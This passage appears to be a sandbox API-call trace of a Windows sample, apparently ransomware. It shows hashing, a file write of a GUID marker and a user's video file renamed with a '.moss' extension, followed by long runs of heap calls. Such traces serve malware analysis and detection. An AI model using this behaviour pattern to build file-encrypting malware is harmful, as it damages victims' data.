pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0170.313] GetLastError () returned 0x0 [0170.313] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0170.313] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0170.313] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0170.313] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0170.313] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0170.313] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0170.313] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0170.313] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0170.314] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x9a1a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.314] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0170.314] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0170.314] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0170.314] CloseHandle (hObject=0x664) returned 1 [0170.316] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2b10 [0170.316] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x880) returned 0x3b4b098 [0170.316] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\wsTyr.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xxuaxzq\\wstyr.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\wsTyr.mkv.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xxuaxzq\\wstyr.mkv.moss")) returned 1 [0170.318] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3392880, ftCreationTime.dwHighDateTime=0x1d5e5d5, ftLastAccessTime.dwLowDateTime=0x8ac14960, ftLastAccessTime.dwHighDateTime=0x1d5d9c7, ftLastWriteTime.dwLowDateTime=0x8ac14960, ftLastWriteTime.dwHighDateTime=0x1d5d9c7, nFileSizeHigh=0x0, nFileSizeLow=0x9a1a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wsTyr.mkv", cAlternateFileName="")) returned 0 [0170.318] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0170.318] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0170.318] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71ba0 | out: hHeap=0xcd0000) returned 1 [0170.318] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0170.318] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2b10 [0170.318] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0170.318] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.318] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.318] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.318] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.318] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.318] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.318] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.318] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.318] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.318] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.318] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.318] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.318] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.318] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.318] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.319] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.319] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.319] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.319] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.319] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.319] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.319] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0170.319] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.319] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.319] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.319] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.319] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0170.319] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.319] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0170.319] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.319] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.319] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.319] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.319] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.319] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.319] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0170.319] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.319] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.319] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.319] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0170.319] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.319] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.319] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.319] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0170.319] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.319] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.319] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.319] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.319] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.319] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.319] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.320] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.320] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.320] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.320] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.320] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0170.320] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.320] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.320] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.320] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0170.320] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.320] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.320] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.320] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.320] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.320] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.320] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.320] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.320] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.320] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.320] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.320] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.320] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.320] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.320] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.320] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.320] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.320] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.320] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.320] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.320] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.320] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.320] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.320] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.320] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.320] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.320] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.320] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.320] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.320] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0170.321] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.321] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0170.321] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.321] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.321] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0170.321] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.321] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0170.321] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0170.321] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.321] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0170.321] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.321] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.321] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.321] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.321] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.321] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0170.321] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.322] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0170.322] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.322] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.322] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0170.322] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.322] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.322] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.322] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0170.322] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.322] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.322] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.322] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.322] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.322] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.322] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.322] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.322] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.322] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.322] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.322] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.322] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.322] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.322] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.322] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.322] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.322] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.322] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.322] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.322] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.322] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.322] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.322] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.322] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.322] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.322] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.322] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.322] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.322] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.323] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.323] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.323] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0170.323] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.323] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0170.323] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.323] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.323] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.323] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.323] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.323] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.323] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0170.323] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.323] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.323] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.323] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0170.323] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.323] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.323] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.323] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.323] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.323] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.323] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.323] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.323] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.323] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.323] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.323] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.323] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0170.323] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.323] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0170.323] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.323] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.323] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0170.323] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.324] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.324] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.324] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0170.324] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.324] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.324] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.324] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.324] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: 